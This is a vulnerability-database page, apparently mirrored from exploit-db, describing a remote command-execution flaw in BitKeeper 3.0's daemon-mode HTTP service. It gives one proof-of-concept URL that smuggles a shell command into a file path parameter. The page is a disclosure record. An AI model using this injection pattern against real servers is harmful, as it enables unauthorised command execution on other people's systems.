BitMover BitKeeper 3.0 – Daemon Mode Remote Command Execution

BitMover BitKeeper 3.0 – Daemon Mode Remote Command Execution

漏洞ID 1053682 漏洞类型
发布时间 2003-01-11 更新时间 2003-01-11
图片[1]-BitMover BitKeeper 3.0 – Daemon Mode Remote Command Execution-安全小百科CVE编号 N/A
图片[2]-BitMover BitKeeper 3.0 – Daemon Mode Remote Command Execution-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22145
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6588/info

It has been reported that BitKeeper is vulnerable to an input validation bug. When the software is run in daemon mode, it starts a service with an interface that can be connected to via HTTP. By sending specially crafted input to the service, it is possible to execute abitrary commands. 

http://www.example.com:port/diffs/foo.c@%27;echo%20%3Eiwashere%27?nav=index.html|src/|hist/foo.c

相关推荐: IIS FTP服务拒绝漏洞

IIS FTP服务拒绝漏洞 漏洞ID 1206735 漏洞类型 未知 发布时间 1999-12-31 更新时间 1999-12-31 CVE编号 CVE-1999-1148 CNNVD-ID CNNVD-199912-155 漏洞平台 N/A CVSS评分 5…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享